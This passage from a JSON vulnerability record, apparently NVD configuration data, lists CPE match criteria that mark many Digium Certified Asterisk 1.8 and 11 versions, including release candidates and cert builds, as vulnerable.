              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.4.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "5DE6F187-7236-4622-BD62-1E5F0742B41B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.4.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "F70DDB6D-BE16-4375-87AE-E5E2B5862D17",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.4.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "6910E07C-3ACA-414F-B468-13E4BF9BE938",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.4.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "837A07D7-C2FD-4077-A0AD-AF2147E04B84",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.5.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "B2A99209-E8C5-44E6-A8DA-7FC07FBA6D87",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.5.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "18985B4A-4C54-4EC6-9274-15E7DCFEC94D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.6.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "48AE70AD-85BE-44DE-BC75-1690C27821B4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.6.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "804F861A-81E1-45C5-A7D3-0E73770AC155",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.6.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "0AE503BD-F9BD-4396-B27D-184AE06F594D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.6.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "9CD9A213-27F7-410E-97B1-E7405B4FCECE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.7.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "10FFDE4F-0B30-43C3-9475-80259D5E9055",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.7.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "5F30E2AB-B354-4583-9D76-9DF1727407A0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.7.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "DBDFE57E-EEBF-4722-B6D0-147F72018DE3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.8.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "902A2600-49A7-4013-A621-9EE94F1E8435",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.8.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "7021D54A-D443-492A-AE8C-62F2B85A1F37",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.8.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "B003CB5A-A95A-481F-B762-79C476829D81",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.8.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "84C8BB88-FBE3-4C82-9D53-E34AA7B6A73E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.8.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "F8037EB0-42FA-45BA-9E8E-D279432EC4CD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.8.0:rc5:*:*:*:*:*:*",
              "matchCriteriaId": "E374559C-E550-4BB9-9682-9C4535EAE9A6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.9.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "FFFB7E8B-C963-4ACB-AE37-9E4938A5462E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.9.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "DF83EAD3-3CC1-4C1B-AAB8-0FE03BB67EC9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.9.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "E3F75AF0-A4E0-425E-B707-ED1F58C9CC83",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.9.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "745EC4D8-5E19-48C8-8609-11A74DC18266",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.10.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "F1871DC4-AA58-4C04-9D6A-4FF383C56405",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.10.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "F8560DBD-A70E-4033-AE2E-96DA373AB425",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.10.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "E08ECE50-3A53-45C1-8BEA-8B9E024E22F0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.10.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "59C2E58B-EEB3-4E8D-940C-2DF846923B19",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.10.0:rc4:*:*:*:*:*:*",
              "matchCriteriaId": "D40F2ADC-6F79-410F-9063-1354C15F0D8E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert:*:*:*:*:*:*",
              "matchCriteriaId": "C63C46CC-02E2-40AF-8281-F2FB5D89823A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert1:*:*:*:*:*:*",
              "matchCriteriaId": "71BAF2A7-024D-475A-88C0-0F5ADE3CA286",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert10:*:*:*:*:*:*",
              "matchCriteriaId": "27E0B1E7-1DA3-47C4-AA2A-54D4C2C48A8D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert2:*:*:*:*:*:*",
              "matchCriteriaId": "82F91FE8-C320-466B-AF08-67319A00A2BC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert3:*:*:*:*:*:*",
              "matchCriteriaId": "DCFF0E1C-B455-4C18-8AA1-10408234327B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert3-rc1:*:*:*:*:*:*",
              "matchCriteriaId": "05D19102-FF8D-439F-87E7-B1FE97C55F8E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert3-rc2:*:*:*:*:*:*",
              "matchCriteriaId": "8EC4CE45-1378-402C-8552-745B6414B9E6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert4:*:*:*:*:*:*",
              "matchCriteriaId": "738F68B3-2C5E-4A09-8FF4-2D034ED0C54D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert5:*:*:*:*:*:*",
              "matchCriteriaId": "6A60C223-AD68-4BFF-91C1-2C7E9F727AA6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert5-rc1:*:*:*:*:*:*",
              "matchCriteriaId": "0F97E946-8876-417D-9C49-D990A14CFBB4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert5-rc2:*:*:*:*:*:*",
              "matchCriteriaId": "887F4341-84C2-40F6-BB7C-68DAFC3D188E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert6:*:*:*:*:*:*",
              "matchCriteriaId": "4C313F81-8B38-4845-B1C7-CBB23D7C99B6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert7:*:*:*:*:*:*",
              "matchCriteriaId": "A08731AB-1E43-48B9-AB4C-0B06A34D0807",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert8:*:*:*:*:*:*",
              "matchCriteriaId": "5A4FBB03-4A60-4A34-855B-74C5079F7769",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert9:*:*:*:*:*:*",
              "matchCriteriaId": "66E97D3F-3AEB-40EB-87E7-18EC7A84F0CA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert9-rc1:*:*:*:*:*:*",
              "matchCriteriaId": "C5CBAA8C-29D9-468C-9FA3-CBC005793955",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "69E55195-84CC-46DB-9E49-DEB864DF0659",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "7F58B52D-9510-465F-8BFB-6896B4D36F5B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "59E72AD4-90BE-4C3B-B457-31FF193712FA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.11.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "81EB266E-40BC-45EA-8EDB-4766011C460B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.12.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "E23FCBC3-30EF-47BC-AEFE-073E84B6DBA7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.12.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "5AB33EDF-29D7-4092-91FE-505B39D3E57B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.12.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "4F698874-028E-410B-90FE-FDD441F55C32",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.12.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "081DA344-7266-4D67-8B92-830F43B42CC9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.13.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "01851B4A-F7CB-4263-B06C-92D39A693530",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.13.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "6BB95638-D09F-4F02-9076-49BE93F2A407",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.13.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "6E2DD3AF-EF01-4A1A-AF9A-98575E36D088",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.14.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "163E8F93-432A-4F68-B309-7A38AE1A30FC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.14.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "F53C384F-75DD-4A29-8907-BA95F08B1465",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.15:-:*:*:*:*:*:*",
              "matchCriteriaId": "6BB940E4-E612-4B27-9188-E794665191B8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert1:*:*:*:*:*:*",
              "matchCriteriaId": "2365F1EE-16A4-4293-B80E-A51CD6A2F112",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert1-rc1:*:*:*:*:*:*",
              "matchCriteriaId": "6B7AE7FB-8170-41AD-9597-07335D36AE48",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert1-rc2:*:*:*:*:*:*",
              "matchCriteriaId": "9131FB32-E3F0-476C-A0D1-36E2101631D6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert1-rc3:*:*:*:*:*:*",
              "matchCriteriaId": "5209356B-4A86-4C93-9D04-C66969F23BC2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert1_rc1:*:*:*:*:*:*",
              "matchCriteriaId": "6952FFDE-92D0-4A75-AABB-113E6FAF5A31",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert1_rc2:*:*:*:*:*:*",
              "matchCriteriaId": "5735354A-CF57-4A9A-9607-169CE50E0655",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert1_rc3:*:*:*:*:*:*",
              "matchCriteriaId": "38E0B2C4-55EA-4712-8E75-24A5718F9FD9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert2:*:*:*:*:*:*",
              "matchCriteriaId": "F087C546-FBCA-4D0D-A023-8F9384CD160C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert3:*:*:*:*:*:*",
              "matchCriteriaId": "832F5503-6354-4E39-B927-3BA9606A372D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert4:*:*:*:*:*:*",
              "matchCriteriaId": "9E23AF8A-63B2-4597-8E78-A4672B0C44B3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert5:*:*:*:*:*:*",
              "matchCriteriaId": "F76EA1D5-F5F3-49CE-9A73-20FA03C31F88",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert6:*:*:*:*:*:*",
              "matchCriteriaId": "593ED9E3-D56C-4336-976B-27D30EED658A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert7:*:*:*:*:*:*",
              "matchCriteriaId": "9FBB5951-3D34-4808-BBC3-5402147FE6A4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.28:*:*:*:*:*:*:*",
              "matchCriteriaId": "9365B811-5620-42F0-9400-5EA49361D2B2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.28:cert1:*:*:lts:*:*:*",
              "matchCriteriaId": "E63726F0-3BC6-49E7-BDE9-71196B480149",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.28:cert1-rc1:*:*:*:*:*:*",
              "matchCriteriaId": "536ECC06-D2DC-474F-AB44-7A8B16ADFC9C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.28:cert2:*:*:*:*:*:*",
              "matchCriteriaId": "6001EFB8-A539-4F3C-B9F3-7A513FA458BD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.28:cert2:*:*:lts:*:*:*",
              "matchCriteriaId": "677AB746-AE4F-46B0-BEE3-82A1FE77271F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.28:cert3:*:*:*:*:*:*",
              "matchCriteriaId": "1035C6D2-E8FD-4FFA-9AC7-17534609D68C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.28:cert4:*:*:*:*:*:*",
              "matchCriteriaId": "DBD12EE0-78F6-450F-9AD9-D64A55377D56",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.28:cert5:*:*:*:*:*:*",
              "matchCriteriaId": "BFA21D5A-0BC6-45E0-AD84-F91F185275B0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:1.8.28.0:*:*:*:lts:*:*:*",
              "matchCriteriaId": "C675C7BA-65E9-4A0A-9A6D-1EBCBEA1D718",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.0.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "4F596E34-529A-41AD-AD51-C1D7EEE0FFF0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.0.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "EC1BE0BB-A469-4DB6-88CF-80A065329C65",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.0.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "4EA68726-87EF-490F-BBB8-A321E6C7A16D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.1.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "1C8B3572-D6F6-45BD-9BE4-D532F9BF134E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.1.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "7738E036-DACC-42EE-B417-CB083319B0A0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.1.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "A6847720-D556-49D7-BD7F-E0559C6F5780",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.1.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "BA81D724-584B-4863-B270-869C415DB5BE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.2:cert1:*:*:*:*:*:*",
              "matchCriteriaId": "02317CB5-C06E-414B-96A3-255607A5DF93",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.2:cert1-rc2:*:*:*:*:*:*",
              "matchCriteriaId": "9F2FC5E1-6E2E-4C7A-A888-60FCA303CCC8",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.2:cert2:*:*:*:*:*:*",
              "matchCriteriaId": "08DEE3EC-63F3-45EB-947E-E8503DBD3669",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.2:cert3:*:*:*:*:*:*",
              "matchCriteriaId": "D68D79BE-8302-42D1-87C2-0F2CFF8B1796",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.3.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "CF76131B-DF2C-4C6A-8E6B-1319D231402D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.3.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "9AB8C209-694F-41BF-9CF2-D68D4E58A43C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.3.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "6438A881-C806-4CC1-9828-C34BBB0FF332",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.4.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "2704EED6-C72D-427D-AD37-EBC4042CDD76",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.4.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "AF835684-26C6-4734-B586-D5DB4DF33072",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.4.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "4EB76BC0-2B72-495E-80FC-C6B194648A91",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.4.0:rc3:*:*:*:*:*:*",
              "matchCriteriaId": "9F1BC546-92E0-4285-8C18-37705F44B94E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.5.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "9D50F0DF-54D3-4883-ADA2-DDB79F786182",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.5.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "0838BEC6-680A-4695-BD1B-309290F16A3B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.5.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "82F78D49-ED8C-43FF-AE6D-713E90F1A1BE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert1:*:*:*:*:*:*",
              "matchCriteriaId": "322694EF-B086-4BE7-A9F0-41D3A9C245FF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert1:*:*:lts:*:*:*",
              "matchCriteriaId": "6AD7C9B3-D029-4E05-8E80-3ADA904FAC1C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert1-rc1:*:*:*:*:*:*",
              "matchCriteriaId": "B178B8F1-4AF8-478A-B842-DD5047D65C9E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert1-rc2:*:*:*:*:*:*",
              "matchCriteriaId": "E9D5545B-44D5-4872-8702-8D49579DE531",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert1_rc1:*:*:*:*:*:*",
              "matchCriteriaId": "781AC882-80DD-4176-8E4F-220343B15F68",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert1_rc2:*:*:*:*:*:*",
              "matchCriteriaId": "770CCEEA-B121-454B-BD36-3FC1B262998A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert10:*:*:*:*:*:*",
              "matchCriteriaId": "5CEBE67E-A3E5-4BC9-8740-4F51123CC9F7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert11:*:*:*:*:*:*",
              "matchCriteriaId": "CD094E25-5E10-4564-9A4D-BE5A14C2815F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert12:*:*:*:*:*:*",
              "matchCriteriaId": "B6873174-0109-402F-ADCA-B1635F441FD9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert12:*:*:lts:*:*:*",
              "matchCriteriaId": "BFFD88AD-C82E-4C5C-9C4F-8A49176E3E52",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert13:*:*:*:*:*:*",
              "matchCriteriaId": "B529CD2F-2958-44E6-839A-3E4FE392B1F1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert13:*:*:lts:*:*:*",
              "matchCriteriaId": "6797C78B-BB9A-46B4-8F0B-492FB1988BB2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert14:*:*:*:*:*:*",
              "matchCriteriaId": "B961BF46-DEF7-4804-AF9A-D13F160FA213",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert14:*:*:lts:*:*:*",
              "matchCriteriaId": "10A38D53-6C8E-493E-8207-F4CF7D754A5D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert14-rc1:*:*:*:*:*:*",
              "matchCriteriaId": "5EE8689E-AF57-400D-B321-D3F66D1169FD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert14-rc2:*:*:*:*:*:*",
              "matchCriteriaId": "5C55AA35-5E1C-4411-BC01-0FF9D1928EC5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert15:*:*:*:*:*:*",
              "matchCriteriaId": "B9305CA8-835C-4DFF-9CD8-C1072BACED42",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert15:*:*:lts:*:*:*",
              "matchCriteriaId": "4CC0C753-9179-4C71-AFD8-C4601D8C865A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert16:*:*:*:*:*:*",
              "matchCriteriaId": "B3729EA6-3949-4854-80D4-DC5587161FBD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert17:*:*:*:*:*:*",
              "matchCriteriaId": "9A416C55-D670-4CCC-BEFE-12CB3438C81B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert18:*:*:*:*:*:*",
              "matchCriteriaId": "A79C0247-82DD-4EE7-80F6-9D3DCBB30FC4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert2:*:*:*:*:*:*",
              "matchCriteriaId": "013B1940-C45D-4FE2-8B49-D92B8F1A9048",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert2:*:*:lts:*:*:*",
              "matchCriteriaId": "CE71221B-4D55-4643-B6D1-307B2CF41F98",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert3:*:*:*:*:*:*",
              "matchCriteriaId": "A98B11B5-B8E2-4903-B4F7-3AC23751AE8F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert3:*:*:lts:*:*:*",
              "matchCriteriaId": "88124275-9BEB-4D53-9E4D-1AC8C52F2D0F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert4:*:*:*:*:*:*",
              "matchCriteriaId": "C7D60B24-C509-49C3-87A9-49D05CB44183",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert4:*:*:lts:*:*:*",
              "matchCriteriaId": "4F3CEFEF-72B6-4B58-81FE-01BCEEFB3013",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert5:*:*:*:*:*:*",
              "matchCriteriaId": "3C1F9978-44E7-4D39-BEC6-5C6DB7F893E9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert5:*:*:lts:*:*:*",
              "matchCriteriaId": "AA637187-0EAE-4756-AD72-A0B2FABCA070",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert6:*:*:*:*:*:*",
              "matchCriteriaId": "69BA61A8-2A95-4800-BB4E-692BA4321A84",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert6:*:*:lts:*:*:*",
              "matchCriteriaId": "6DAF6784-0B31-4104-9D85-473D5AFAB785",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert7:*:*:*:*:*:*",
              "matchCriteriaId": "C481D8B0-622D-491D-B292-717B0369B507",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert7:*:*:lts:*:*:*",
              "matchCriteriaId": "77B06B83-D62C-4A0E-BE94-83C9A02CE55A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert8:*:*:*:*:*:*",
              "matchCriteriaId": "BC8390D4-F339-43FF-9F2B-71331D4ECB81",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert8:*:*:lts:*:*:*",
              "matchCriteriaId": "CAD17809-CBB1-4E41-99C9-20FE56853563",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert9:*:*:*:*:*:*",
              "matchCriteriaId": "4490B76B-FA41-43DB-9A31-6B3F220F1907",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6.0:*:*:*:lts:*:*:*",
              "matchCriteriaId": "D6EE9895-FB94-451D-8701-8C0DD8F5BED0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6.0:-:*:*:*:*:*:*",
